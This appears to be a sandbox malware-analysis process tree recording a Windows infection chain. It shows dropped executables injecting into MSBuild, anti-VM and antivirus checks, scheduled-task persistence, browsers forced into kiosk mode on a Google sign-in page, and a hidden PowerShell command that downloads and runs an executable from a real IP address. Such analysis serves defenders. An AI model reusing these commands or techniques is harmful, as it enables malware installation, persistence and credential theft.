C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,2391294570805351121,11839459589128454801,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:111⤵
- Uses browser remote debugging
PID:224
-
-
-
C:\ProgramData\5fus0r1v3e.exe"C:\ProgramData\5fus0r1v3e.exe"10⤵PID:3164
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"11⤵PID:6848
-
-
-
C:\ProgramData\djmo8g4ect.exe"C:\ProgramData\djmo8g4ect.exe"10⤵PID:1612
-
C:\ProgramData\djmo8g4ect.exe"C:\ProgramData\djmo8g4ect.exe"11⤵PID:4772
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"12⤵PID:2228
-
-
C:\Users\Admin\AppData\Local\Fw5n6iabAyK9.exe"C:\Users\Admin\AppData\Local\Fw5n6iabAyK9.exe"12⤵PID:14532
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"13⤵PID:14348
-
-
-
C:\Users\Admin\AppData\Local\ELXuE13IRrmf.exe"C:\Users\Admin\AppData\Local\ELXuE13IRrmf.exe"12⤵PID:13376
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"13⤵PID:14424
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"13⤵PID:14060
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"14⤵
- Uses browser remote debugging
PID:31720 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffd6a40dcf8,0x7ffd6a40dd04,0x7ffd6a40dd1015⤵PID:37552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1992,i,10017349146577293688,5844059339991061305,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1988 /prefetch:215⤵PID:37368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1568,i,10017349146577293688,5844059339991061305,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2144 /prefetch:315⤵PID:37352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2212,i,10017349146577293688,5844059339991061305,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2880 /prefetch:815⤵PID:37272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3244,i,10017349146577293688,5844059339991061305,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3256 /prefetch:115⤵
- Uses browser remote debugging
PID:37176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3260,i,10017349146577293688,5844059339991061305,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3292 /prefetch:115⤵
- Uses browser remote debugging
PID:37168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4200,i,10017349146577293688,5844059339991061305,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4236 /prefetch:215⤵
- Uses browser remote debugging
PID:37072
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4664,i,10017349146577293688,5844059339991061305,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4672 /prefetch:115⤵
- Uses browser remote debugging
PID:31356
-
-
-
-
-
C:\Users\Admin\AppData\Local\XsIwnDdoi9yl.exe"C:\Users\Admin\AppData\Local\XsIwnDdoi9yl.exe"12⤵PID:18964
-
C:\Users\Admin\AppData\Local\Temp\SXaYE2r5\41XUtFYpupHffPs3.exeC:\Users\Admin\AppData\Local\Temp\SXaYE2r5\41XUtFYpupHffPs3.exe 013⤵PID:19060
-
C:\Users\Admin\AppData\Local\Temp\SXaYE2r5\cLslmErBPYyTEtXb.exeC:\Users\Admin\AppData\Local\Temp\SXaYE2r5\cLslmErBPYyTEtXb.exe 1906014⤵PID:24932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 24932 -s 57215⤵
- Program crash
PID:31360
-
-
-
-
-
-
-
C:\ProgramData\cjwbaas0hv.exe"C:\ProgramData\cjwbaas0hv.exe"10⤵PID:5308
-
C:\Users\Admin\AppData\Local\Temp\1Em4pQdp\ZaoGrJHNl4a2KMlU.exeC:\Users\Admin\AppData\Local\Temp\1Em4pQdp\ZaoGrJHNl4a2KMlU.exe 011⤵PID:4596
-
C:\Users\Admin\AppData\Local\Temp\1Em4pQdp\FkkkemdfH8bLOHpz.exeC:\Users\Admin\AppData\Local\Temp\1Em4pQdp\FkkkemdfH8bLOHpz.exe 459612⤵PID:2936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 159613⤵
- Program crash
PID:19192
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 97212⤵
- Program crash
PID:30008
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\i5x4o" & exit10⤵PID:16068
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1111⤵
- Delays execution with timeout.exe
PID:16140
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3488 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4944
-
-
-
C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3468 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:4908
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2448
-
-
-
C:\Users\Admin\AppData\Local\Temp\10046340101\9b5f01d4a1.exe"C:\Users\Admin\AppData\Local\Temp\10046340101\9b5f01d4a1.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2376 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Bc.wbk Bc.wbk.bat & Bc.wbk.bat9⤵
- System Location Discovery: System Language Discovery
PID:1832 -
C:\Windows\SysWOW64\tasklist.exetasklist10⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"10⤵
- System Location Discovery: System Language Discovery
PID:2204
-
-
C:\Windows\SysWOW64\tasklist.exetasklist10⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"10⤵
- System Location Discovery: System Language Discovery
PID:3012
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 67418710⤵
- System Location Discovery: System Language Discovery
PID:2728
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Funky.wbk10⤵
- System Location Discovery: System Language Discovery
PID:5388
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Und" Tournament10⤵
- System Location Discovery: System Language Discovery
PID:4716
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 674187\Constraints.com + Lu + Pepper + Cn + Hairy + Nose + Providence + Bra + Corresponding + Promo + Ending 674187\Constraints.com10⤵
- System Location Discovery: System Language Discovery
PID:2244
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Losses.wbk + ..\Finally.wbk + ..\Medications.wbk + ..\Borough.wbk + ..\Trim.wbk + ..\Ellis.wbk + ..\Truly.wbk + ..\Was.wbk r10⤵
- System Location Discovery: System Language Discovery
PID:2176
-
-
C:\Users\Admin\AppData\Local\Temp\674187\Constraints.comConstraints.com r10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5564
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 510⤵
- System Location Discovery: System Language Discovery
PID:5560
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2104 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:512
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:5948
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3028
-
-
-
C:\Users\Admin\AppData\Local\Temp\10050360101\Amadey.exe"C:\Users\Admin\AppData\Local\Temp\10050360101\Amadey.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5244 -
C:\Users\Admin\AppData\Local\Temp\dbf9c9b26f\tgvazx.exe"C:\Users\Admin\AppData\Local\Temp\dbf9c9b26f\tgvazx.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2888
-
-
-
C:\Users\Admin\AppData\Local\Temp\10051520101\dc6b7a79b8.exe"C:\Users\Admin\AppData\Local\Temp\10051520101\dc6b7a79b8.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4900 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10051520101\dc6b7a79b8.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5092
-
-
-
C:\Users\Admin\AppData\Local\Temp\10051530101\522e881ea4.exe"C:\Users\Admin\AppData\Local\Temp\10051530101\522e881ea4.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5628 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10051530101\522e881ea4.exe"9⤵
- Executes dropped EXE
PID:3404
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10451860101\trOUuPI.exe"C:\Users\Admin\AppData\Local\Temp\10451860101\trOUuPI.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5320 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:1152
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:2216
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:3904
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5332
-
-
-
C:\Users\Admin\AppData\Local\Temp\10453070101\UU0LfLZ.exe"C:\Users\Admin\AppData\Local\Temp\10453070101\UU0LfLZ.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:812
-
-
C:\Users\Admin\AppData\Local\Temp\10453880101\e2bf8bc9ca.exe"C:\Users\Admin\AppData\Local\Temp\10453880101\e2bf8bc9ca.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2612 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn xrsk9ma5XTJ /tr "mshta C:\Users\Admin\AppData\Local\Temp\mYd5F82Ba.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
PID:2644 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn xrsk9ma5XTJ /tr "mshta C:\Users\Admin\AppData\Local\Temp\mYd5F82Ba.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3804
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\mYd5F82Ba.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4104 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'SUEV9JCXILJMGKFVKDH5JEUYLPMFSTIH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1496 -
C:\Users\Admin\AppData\Local\TempSUEV9JCXILJMGKFVKDH5JEUYLPMFSTIH.EXE"C:\Users\Admin\AppData\Local\TempSUEV9JCXILJMGKFVKDH5JEUYLPMFSTIH.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2068
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10453890101\c3842a84fc.exe"C:\Users\Admin\AppData\Local\Temp\10453890101\c3842a84fc.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4776
-
-
C:\Users\Admin\AppData\Local\Temp\10453900101\b07dfdddb1.exe"C:\Users\Admin\AppData\Local\Temp\10453900101\b07dfdddb1.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:672 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10453900101\b07dfdddb1.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3356
-
-
-
C:\Users\Admin\AppData\Local\Temp\10453910101\3d6c756052.exe"C:\Users\Admin\AppData\Local\Temp\10453910101\3d6c756052.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5148 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10453910101\3d6c756052.exe"7⤵
- Executes dropped EXE
PID:1980
-
-
-
C:\Users\Admin\AppData\Local\Temp\10453920101\4c8c26e4ba.exe"C:\Users\Admin\AppData\Local\Temp\10453920101\4c8c26e4ba.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1540
-
-
C:\Users\Admin\AppData\Local\Temp\10453930101\4f64c61f7f.exe"C:\Users\Admin\AppData\Local\Temp\10453930101\4f64c61f7f.exe"6⤵
- Checks BIOS information in registry
- Executes dropped EXE
PID:5432
-
-
C:\Users\Admin\AppData\Local\Temp\10453940101\3ee385dc43.exe"C:\Users\Admin\AppData\Local\Temp\10453940101\3ee385dc43.exe"6⤵PID:5148
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- Kills process with taskkill
PID:5752
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- Kills process with taskkill
PID:4724
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- Kills process with taskkill
PID:4480
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- Kills process with taskkill
PID:2076
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- Kills process with taskkill
PID:2712
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:2860
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵PID:2344
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1980 -prefsLen 27099 -prefMapHandle 1984 -prefMapSize 270279 -ipcHandle 2068 -initialChannelId {ffadd431-dd05-47fb-a9d2-420bdbf45f40} -parentPid 2344 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2344" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:3524
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2460 -prefsLen 27135 -prefMapHandle 2464 -prefMapSize 270279 -ipcHandle 2472 -initialChannelId {fc33091e-6cab-4fd6-b80a-5e8066fb273e} -parentPid 2344 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2344" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:2452
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3744 -prefsLen 25213 -prefMapHandle 3748 -prefMapSize 270279 -jsInitHandle 3752 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3776 -initialChannelId {988acf17-8d70-4535-ab25-5efebee60d89} -parentPid 2344 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2344" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵PID:3580
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3972 -prefsLen 27325 -prefMapHandle 3976 -prefMapSize 270279 -ipcHandle 4056 -initialChannelId {21004732-d897-4562-bd77-367156926dcd} -parentPid 2344 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2344" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:4112
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2756 -prefsLen 34824 -prefMapHandle 2720 -prefMapSize 270279 -jsInitHandle 2944 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3140 -initialChannelId {b136a252-c09c-41c7-91b6-737407c3054d} -parentPid 2344 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2344" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵PID:3904
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5056 -prefsLen 35012 -prefMapHandle 5060 -prefMapSize 270279 -ipcHandle 5068 -initialChannelId {054c21d5-d155-4141-8b73-3b94198eb89f} -parentPid 2344 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2344" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵PID:7072
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5428 -prefsLen 32952 -prefMapHandle 5432 -prefMapSize 270279 -jsInitHandle 5436 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5408 -initialChannelId {383a8961-9438-4ebe-8697-fa32b228f060} -parentPid 2344 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2344" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵PID:6764
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5608 -prefsLen 32952 -prefMapHandle 5612 -prefMapSize 270279 -jsInitHandle 5616 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5624 -initialChannelId {d0965a97-faea-4c65-b5f1-985f7904cde1} -parentPid 2344 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2344" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵PID:6656
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5796 -prefsLen 32952 -prefMapHandle 5800 -prefMapSize 270279 -jsInitHandle 5804 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5812 -initialChannelId {b426f155-d647-4ecc-b0c2-5d5085ffec67} -parentPid 2344 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2344" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵PID:6636
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10453950101\e69cb3d1b7.exe"C:\Users\Admin\AppData\Local\Temp\10453950101\e69cb3d1b7.exe"6⤵PID:4672
-
-
C:\Users\Admin\AppData\Local\Temp\10453960101\Mbxp0H9.exe"C:\Users\Admin\AppData\Local\Temp\10453960101\Mbxp0H9.exe"6⤵PID:6984
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:6816
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:6796
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:6784
-
C:\Users\Admin\AppData\Roaming\wDwedsI0UY.exe"C:\Users\Admin\AppData\Roaming\wDwedsI0UY.exe"8⤵PID:6608
-
C:\Users\Admin\AppData\Roaming\wDwedsI0UY.exe"C:\Users\Admin\AppData\Roaming\wDwedsI0UY.exe" h9⤵PID:3900
-
-
-
C:\Users\Admin\AppData\Roaming\BpeXE3Pl9A.exe"C:\Users\Admin\AppData\Roaming\BpeXE3Pl9A.exe"8⤵PID:6836
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10453970101\but2.exe"C:\Users\Admin\AppData\Local\Temp\10453970101\but2.exe"6⤵PID:6972
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "PCI Bus Driver" /tr C:\Drivers\pcidrv.exe /sc minute /mo 1 /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:6508
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Drivers\pcidrv.exe /sc onstart /ru SYSTEM /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:6016
-
-
C:\Drivers\pcidrv.exeC:\Drivers\pcidrv.exe7⤵PID:4776
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\10453970101\but2.exe7⤵PID:3432
-
C:\Windows\SysWOW64\timeout.exetimeout /t 28⤵
- Delays execution with timeout.exe
PID:672
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10453980101\851bde5a27.exe"C:\Users\Admin\AppData\Local\Temp\10453980101\851bde5a27.exe"6⤵PID:1856
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:1764
-
-
-
C:\Users\Admin\AppData\Local\Temp\10453990101\larBxd7.exe"C:\Users\Admin\AppData\Local\Temp\10453990101\larBxd7.exe"6⤵PID:5016
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat7⤵PID:5872
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:12396
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵PID:12404
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:10140
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵PID:10088
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10454000101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10454000101\Rm3cVPI.exe"6⤵PID:15796
-
-
